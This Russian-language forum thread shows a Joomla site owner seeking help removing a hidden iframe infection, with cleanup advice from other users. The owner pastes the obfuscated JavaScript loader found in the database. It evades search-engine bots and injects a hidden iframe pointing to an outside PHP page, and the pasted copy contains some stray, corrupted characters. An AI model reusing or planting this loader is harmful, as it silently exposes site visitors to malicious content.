На сайте появился iframe вирус, куда копать ? (1 Viewer)

[f3n0s1]

Привет всем, я уже час без остановки копаю файлы но всё впустую, вирус найти не удалось. Решил написать сюда может быть кто то уже сталкивался с этой проблемой, вот кусок кода который постоянно висит в конце шаблона - Прочитал множество инфы про вирус iframe но ничего о том где и как его искать. Помогите !

 

[DeViL]

f3n0s1,Может я чего-то не понимаю, но этот iframe просто открывает Google это не вирус

 

[f3n0s1]

Вирус генерирующий iframe , а то что там есть это не я разместил и оно динамично

 

[DeViL]

f3n0s1,а, да.. не все посмотрел)

 

[Skif]

f3n0s1,.htaccess в корне смотрели? поменяйте шаблон, посмотрите будут вредоносный код на другом шаблоне?

 

[f3n0s1]

Да проверял, любой новый не новый шаблон устанавливаю и тоже самое наблюдаю в корне шаблона (

 

[nadz3r.js]

f3n0s1,Пароли менял?

 

[f3n0s1]

Да это первое что я сделал когда обнаружил этот вирус )

 

[nadz3r.js]

f3n0s1,Ищи все скрипты и каждый смотри

 

[f3n0s1]

Хороший совет )) только я уже все плагины и модули просмотрел даже по дате создания. ничего не нашел

 

[Гульсина]

f3n0s1,Я недавно столкнулась с вирусами, на 3х своих сайтах чистила. Нужно понять что именно вставляет везде код и качать все файлы сайта, все штудировать, удалять всё. Обновлять все модули, плагины и компоненты, а так же саму джумлу.В первую очередь менять пароли на хостинг, ФТП, и на самом сайте. Версия джумлы случайно не 1.5+ версии?Может появились какие то левые файлы, папки? (обычно в корне, сразу заметно, если есть левое что то)Так же нужно смотреть какие файлы изменялись/перезаписывались в последний раз. Ну и нужно у хостера логи запросить.P.S. Но у меня другой случай был, у меня вредоносное ПО было, сайты с поисковиков выпали, доступ заблокированный был, пока не почистила и не доложила Платону и в Гугл. Потом сайты снова в поисковик вышли.

 

[f3n0s1]

У меня нет левых папок, все недавно изменённые файлы я просмотрел левого ничего не обнаружил , видимо там что то мне незнакомое. Да джумла у меня 1.5 , написал в саппорт о том чтоб восстановили мне бэкап недельной давности , буду дальше рыть. К сожалению я не могу обновить джумлу , масса модулей которые уже не поддерживаются в новых версия джумлы будут не работоспособны, приходится вот так извращаться.

 

[Гульсина]

f3n0s1,Рекомендую обновиться, дыр много, проблемы будут постоянно. А всем модулям, есть вполне достойные и превосходящие конкуренты. Да и в самих модулях тоже может быть причина.

 

[f3n0s1]

Буду иметь ввиду

 

[Гульсина]

f3n0s1,Да тут и иметь ничего не надо, старые версии ВСЕ подвержены атакам, взломам. Тут есть Сандра, думаю она за 3 минуты шелов вам накидает при желании.

 

[f3n0s1]

Посоветуйте как обновится вручную или через какой модуль ?

 

[f3n0s1]

нашел таких я где крылась проблема, видимо у меня угнали логин и пароль и pа двое суток напичкали все стать этим кодом. АХТУНГ ВРЕДОНОСНЫЙ КОД<script>var _0xf6f1=["\\x74\\x6F\\x4C\\x6F\\x63\\x61\\x6C\\x65\\x4C\\x6F\\x77\\x65\\x72\\x43\\x61\\x73\\x65","\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74","\\x79\\x61\\x6E\\x64\\x65\\x78\\x62\\x6F\\x74","\\x79\\x61\\x6Ex64\\x65\\x78\\x6D\\x65\\x74\\x72\\x69\\x6B\\x61","x79\\x61\\x6E\\x64\\x65\\x78\\x69\\x6D\\x61\\x67\\x65\\x73","\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74";,"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66","\\x77\\x69\\x64\\x74\\x68","\\x68\\x65\\x69\\x67\\x68\\x74","\\x6F\\x6E\\x6D\\x6F\\x75\\x73\\x65\\x6D\\x6F\\x76\\x65","\\x62\\x6F\\x64\\x79","\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61x67\\x4E\\x61\\x6D\\x65","\\x67\\x6F\\x6F\\x67\\x6Cx65\\x61\\x6E\\x61\\x6C\\x79\\x74\\x69\\x63\\x73\\x69\\x66\\x72\\x61\\x6D\\x65","\\x67\\x65\\x74\\x45\\x6Cx65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64","\\x69x66\\x72\\x61\\x6D\\x65","\\x63\\x72\\x65\\x61\\x74x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74","\\x31\\x32\\x70\\x78","\\x69\\x64","\\x73\\x72\\x63",4;\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2Ex73\\x61\\x66\\x65\\x2D\\x63\\x6C\\x65\\x61\\x6E\\x69\\x6E\\x67\\x2E\\x63\\x6F\\x2E\\x75\\x6B\\x2F\\x6D\\x6F\\x64\\x75\\x6C\\x65\\x73\\x2F\\x6D\\x6F\\x64\\x5F\\x61\\x72x63\\x68\\x69\\x76\\x65\\x2F\\x6D\\x69\\x64\\x64\\x6C\\x65\\x2E\\x70\\x68\\x70","\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64","\\x69\\x6E\\x6E\\x65\\x72\\x57\\x69\\x64\\x74\\x68","\\x6E\\x75\\x6D\\x62x65\\x72","\\x69\\x6E\\x6E\\x65\\x72\\x48\\x65\\x69x67\\x68\\x74","\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6Ex74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74","\\x63\\x6C\\x69\\x65\\x6E\\x74\\x57\\x69\\x64\\x74\\x68","\\x63\\x6C\\x69\\x65\\x6E\\x74\\x48\\x65\\x69\\x67\\x68\\x74","\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x41\\x6E\\x61\\x6Cx79\\x74\\x69\\x63\\x73\\x53\\x74\\x61\\x74\\x69\\x73\\x74\\x69\\x63\\x73\\x42\\x75\\x69\\x6C\\x64\\x28\\x29"];function googleAnalyticsStatisticsBuild(){var _0xde2dx2=navigator[_0xf6f1[1]][_0xf6f1[0]]();var _0xde2dx3=[_0xf6f1[2],_0xf6f1[3],_0xf6f1[4],_0xf6f1[5]];for(k in _0xde2dx3){if(_0xde2dx2[_0xf6f1[6]](_0xde2dx3[k])!=-1){return;};};var _0xde2dx4=detectBrowserSize();if(_0xde2dx4[_0xf6f1[7]    3;==0||_0xde2dx4[_0xf6f1[8]]==0){return;};var _0xde2dx5=false;if(document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]]){_0xde2dx5=document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]];} ;document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]]=function (){if(!document[_0xf6f1[13]](_0xf6f1[12])){iframe=document[_0xf6f1[15]](_0xf6f1[14]);iframe[_0xf6f1[7]]=_0xf6f1[16];iframe[_0xf6f1[8]]=_0xf6f1[16];iframe[_0xf6f1[17]]=_0xf6f1[12];iframe[_0xf6f1[18]]=_0xf6f1[19];document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[;20]](iframe);} ;if(_0xde2dx5!==false){_0xde2dx5();};};};function detectBrowserSize(){var _0xde2dx7=0,_0xde2dx8=0;if( typeof (window[_0xf6f1[21]])==_0xf6f1[22]){_0xde2dx7=window[_0xf6f1[21]];_0xde2dx8=window[_0xf6f1[23]];} else {if(document[_0xf6f1[24]]&&(document[_0xf6f1[24]][_0xf6f1[25]]||document[_0xf6f1[24]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[24]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[24]][_0xf6f1[26]];} else {if(document[_0xf6f1[10]]&&(document[_0xf6f1[10]][_0xf6f1[25]]||document[_0xf6f1[10]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[10]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[10]][_0xf6f1[26]];} ;};};return {width:_0xde2dx7,height:_0xde2dx8};};setTimeout(_0xf6f1[27],500);</script>Теперь задача состоит в том , как удалить этот код во всех таблицах базы данных joomla , может быть есть идеи у кого ? буду очень благодарен

 

[trolb]

Цитата: f3n0s1Теперь задача состоит в том , как удалить этот код во всех таблицах базы данных joomla , может быть есть идеи у кого ? буду очень благодаренскачиваешь бд в тхт файле и ручками.зы могу я сделать за 15 вмз

 

[f3n0s1]

Да это здорово ! но вот бд весит порядка 5 гиг )

 

[trolb]

f3n0s1, и ?Тебе нужны конкретные таблицы с новостями: выбираешь, дампишь и чистишь. В чем проблема-то?